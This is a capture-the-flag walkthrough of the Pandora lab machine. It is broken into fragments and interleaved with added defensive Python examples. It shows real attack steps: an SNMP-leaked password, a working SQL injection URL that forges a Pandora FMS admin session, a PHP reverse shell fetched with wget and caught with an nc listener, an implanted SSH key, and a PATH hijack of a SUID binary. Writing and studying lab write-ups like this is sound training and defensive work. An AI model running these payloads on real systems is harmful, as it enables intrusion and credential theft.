nmap. We can quickly scan for open ports and store them in a variable: `ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.136 | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)`. Then, we can scan those specific ports in depth by running nmap's built-in scripts: `nmap -p$ports -sC -sV 10.10.11.136`.

`sudo nmap -p- -sU -r -T5 10.10.11.136 -v` (`-r` specifies that ports will be scanned sequentially instead of randomly. We do this because services are more likely to be running on ports 1-1000.):

`ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.136/FUZZ`:

The `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt` wordlist also doesn't find anything useful.

`panda.htb`, so we'll add that to our hosts file with `echo "10.10.11.136 panda.htb" | sudo tee -a /etc/hosts`. Trying to find other possible virtual hosts with `ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://panda.htb -H "Host: FUZZ.panda.htb" -fl 908` for both `panda.htb` and `pandora.htb` does not yield any results.

`sudo nmap -p161 -sU -T5 -sC -sV 10.10.11.136 > nmap_port161udp_scan.txt`: nmap_port161udp_scan.txt. This scan is quite large, which is why we redirect it into a file.

`snmpwalk` attempts to walk through all of the available MIBs and retrieve the information. "Before running our `snmpwalk` command, we should install `snmp-mibs-downloader`. This package will install all of the MIB files that aren't included by default due to licensing issues" (quote from epi052.gitlab.io). We will run `sudo apt-get install snmp-mibs-downloader; sudo download-mibs` to get the MIB files.

`snmpwalk` output and the `nmap` output because we used `-sC` to run scripts (specifically, the `snmp-processes` nmap script was run). Looking at process id `855` in either tool's output shows `/bin/sh` being run with the parameters `-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'`:
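A defender's view of the same finding, as an added example that is not part of the writeup: parse the `hrSWRunName`/`hrSWRunParameters` rows that `snmpwalk` returns and flag processes whose arguments carry a credential, so secrets passed on a command line are caught before a read-only community string exposes them. The walk lines are constructed samples and the password value is a placeholder.

```python
import re

# Constructed snmpwalk-style lines in the shape of the HOST-RESOURCES-MIB
# process tables (net-snmp output with MIBs loaded); not from the real host.
SAMPLE_WALK = """
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.855 = STRING: "sh"
HOST-RESOURCES-MIB::hrSWRunName.901 = STRING: "cron"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "--system --deserialize 38"
HOST-RESOURCES-MIB::hrSWRunParameters.855 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p Placeholder_Pw1'"
HOST-RESOURCES-MIB::hrSWRunParameters.901 = STRING: "-f"
""".strip().splitlines()

WALK_LINE = re.compile(
    r'^HOST-RESOURCES-MIB::(hrSWRunName|hrSWRunParameters)\.(\d+)'
    r'\s*=\s*STRING:\s*"?(.*?)"?\s*$')

# Argument shapes that carry a secret; group 1 is the secret so it can be masked.
# Tune for your fleet: "-p" is also a port flag for some tools (false positives).
SECRET_PATTERNS = [
    re.compile(r'(?:^|\s)-p\s*([^\s\'"]+)'),
    re.compile(r'--?(?:password|passwd|pass|token|secret)[=\s]+([^\s\'"]+)', re.I),
    re.compile(r'\b(?:PGPASSWORD|MYSQL_PWD|AWS_SECRET_ACCESS_KEY)=([^\s\'"]+)'),
]

def parse_hr_sw_run(lines):
    """Group hrSWRun* rows by PID: {pid: {"name": ..., "parameters": ...}}."""
    procs = {}
    for line in lines:
        m = WALK_LINE.match(line.strip())
        if m:
            col = m.group(1)[len("hrSWRun"):].lower()   # "name" / "parameters"
            procs.setdefault(int(m.group(2)), {})[col] = m.group(3)
    return procs

def find_exposed_secrets(procs):
    """Return (pid, name, masked_parameters) for every process whose command
    line matches a secret pattern; anyone with SNMP read access sees these."""
    findings = []
    for pid, p in sorted(procs.items()):
        params = p.get("parameters", "")
        masked, hit = params, False
        for pat in SECRET_PATTERNS:
            for m in pat.finditer(params):
                hit = True
                masked = masked.replace(m.group(1), "***")
        if hit:
            findings.append((pid, p.get("name", "?"), masked))
    return findings
```

The same parser works on `ps -eo pid,comm,args` output with a different line regex; the fix on the host side is to pass credentials via a config file or environment that the wrapper reads, not as arguments.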
`cat /etc/passwd` shows that the user with id
The `user.txt` flag is in `matt`'s home folder, which we can see by running
`/usr/bin/host_check -u daniel -p HotelBabylon23` produces:

`localhost.localdomain`. Let's see what it is with `curl localhost.localdomain`, which shows `<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">`. Running `curl localhost.localdomain/pandora_console/` displays a whole website. Running `(netstat -punta || ss --ntpu) | grep "127.0"` to list open local ports doesn't show anything out of the ordinary, so this web server must be running as a different user:

`/var/www/` since we know this machine is using Apache due to our first `nmap` scan. There are two folders in
`html`, which contains the original website we accessed on port
`pandora`, which contains the new site we found running locally.
`ls -la pandora_console/` shows a lot of files owned by `matt`'s user, so this is almost certainly our lateral movement vector.
`cat /etc/apache2/sites-enabled/pandora.conf` to look at the Apache configuration for this site shows that it is indeed running under the
`80`. So, let's forward that to our attack machine with `ssh -L 8080:localhost:80 [email protected]`. Now, navigating to `http://localhost:8080/pandora_console/` brings us to a login page.

`daniel:HotelBabylon23` results in a message appearing that says "User only can use the API."

`8080` since that is what we are using. Now, going to `http://localhost:8080/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271` in your browser and then navigating back to `http://localhost:8080/pandora_console/` will log you into PandoraFMS as an administrator. A video of this happening can be seen on the blog post linked from the repo: Pandora FMS 742: Critical Code Vulnerabilities Explained.
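Why the `session_id` injection above works and what the fix looks like, as an added example that is not from the writeup or from Pandora FMS's code: a sqlite3 stand-in for `tsessions_php` (table schema and query shape are assumptions), the string-built lookup that the page's payload defeats, and the bound-parameter version plus a session-id format check that rejects it outright.

```python
import re
import sqlite3

# The URL-decoded session_id payload from the writeup.
PAYLOAD = ("a' UNION SELECT 'a',1,'id_usuario|s:5:\"admin\";' as data "
           "FROM tsessions_php WHERE '1'='1")

# PHP session ids are [A-Za-z0-9,-]; anything else is rejected before any query.
SESSION_ID_RE = re.compile(r'^[A-Za-z0-9,-]{1,128}$')

def valid_session_id(session_id):
    return bool(SESSION_ID_RE.match(session_id))

def make_db():
    """Constructed stand-in for Pandora's tsessions_php table (schema assumed:
    id_session, last_active, data holding the PHP-serialized session)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tsessions_php "
                 "(id_session TEXT, last_active INTEGER, data TEXT)")
    conn.execute("INSERT INTO tsessions_php VALUES (?, ?, ?)",
                 ("real-session-id", 1, 'id_usuario|s:6:"daniel";'))
    return conn

def lookup_session_vulnerable(conn, session_id):
    """String-built query: the payload's quote closes the literal and the UNION
    appends a row whose data column claims to be admin's session."""
    sql = "SELECT * FROM tsessions_php WHERE id_session = '%s'" % session_id
    return [row[2] for row in conn.execute(sql)]

def lookup_session_safe(conn, session_id):
    """Bound parameter: session_id is always a value, never SQL text, so the
    payload is merely an id that matches no row."""
    sql = "SELECT * FROM tsessions_php WHERE id_session = ?"
    return [row[2] for row in conn.execute(sql, (session_id,))]

def session_user(data):
    """Username stored in a serialized session string, or None."""
    m = re.search(r'id_usuario\|s:\d+:"([^"]*)"', data or "")
    return m.group(1) if m else None
```

The detection angle is the same shape: a `session_id` parameter containing quotes or the keyword `UNION` in the web server access log for `chart_generator.php` is a reliable alert.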
`admin` in the top right brings you to a page where you can edit your user's details. I changed the password to `admin` and then clicked "Update" at the bottom.

`linux/http/pandora_ping_cmd_exec` also fails even after I created a new user in the interface. This exploit-db script fails as well. Also, TheCyberGeek/CVE-2020-5844 fails too. TheCyberGeek's script probably is supposed to work since he is one of the creators of this box. Additionally, after solving the box, I found this repo: shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated. So, this exploit might also work.

`Admin tools > File manager` on the left. So, let's get a PHP reverse shell with `wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php`, edit in our IP address and port, start a listener with `nc -nvlp 28600`, and then go to `http://localhost:8080/pandora_console/images/php-reverse-shell.php` on the server to get a reverse shell. This is successful!

`run implant.authorized_key key=/home/kali/.ssh/id_rsa` in `pwncat`. I set the permissions of the `.ssh` folder to be what they should be with `chmod 700 .ssh && chmod 600 .ssh/authorized_keys`.

`cat /home/matt/user.txt` to get the
`ls -la /usr/bin/pandora_backup` shows that this is a SUID binary. Running the actual `/usr/bin/pandora_backup` script appears to create a `tar` archive of the
`download /usr/bin/pandora_backup` to download it to our local machine with `pwncat` since the target machine does not have the
`tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*` in the output. So, it looks like it is just running the `tar` binary from a relative path. We can create a new file called `tar` in our home directory that simply runs
`mkdir ~/bin; echo "/bin/bash" > ~/bin/tar`. Set the new "tar" file to executable with `chmod +x ~/bin/tar`. Now, we can add that to our path ahead of any other directory with `export PATH=/home/matt/bin:$PATH`. Now, we can run the SUID binary again:
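The root cause here is a privileged program invoking `tar` through the caller's PATH. As an added hardening check that is not part of the writeup, this lists SUID binaries on a host you administer whose embedded strings call common tools by bare name; the command list and the audit root are assumptions.

```python
import os
import re
import stat

# Tool names that typically appear inside system()/popen() strings.
COMMANDS = ("tar", "sh", "bash", "cp", "mv", "rm", "cat", "gzip", "find",
            "chmod", "chown", "curl", "wget")

# A printable run that starts with a bare tool name: no leading '/' and not the
# tail of a longer token, so "/usr/bin/tar", "start" and "backup.tar.gz" are ignored.
BARE_CMD = re.compile(
    rb"(?<![A-Za-z0-9_./-])(?:" + b"|".join(c.encode() for c in COMMANDS)
    + rb") [ -~]{0,120}")

def bare_command_strings(data: bytes):
    """Return the embedded strings in `data` that invoke a tool by bare name."""
    return sorted({m.group(0).decode("ascii") for m in BARE_CMD.finditer(data)})

def is_suid(path):
    st = os.lstat(path)  # lstat: do not follow symlinks into other trees
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)

def audit_suid(root="/"):
    """Map each SUID binary under `root` to the bare-name strings it contains."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if not is_suid(path):
                    continue
                with open(path, "rb") as fh:
                    hits = bare_command_strings(fh.read())
            except OSError:
                continue  # unreadable or vanished; skip it
            if hits:
                findings[path] = hits
    return findings

if __name__ == "__main__":
    for path, hits in audit_suid("/usr").items():
        print(f"[!] {path} invokes tools by bare name (fix: absolute paths, "
              f"or exec without a shell and a fixed PATH):")
        for h in hits:
            print("     ", h)
```

A flagged binary should be rebuilt to call `/bin/tar` (or `execve` with a fixed argv and a sanitized environment); dropping the SUID bit and moving the backup to a root cron job removes the exposure entirely.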
`cat /root/root.txt` to get the
`run implant.authorized_key key=/home/kali/.ssh/id_rsa` in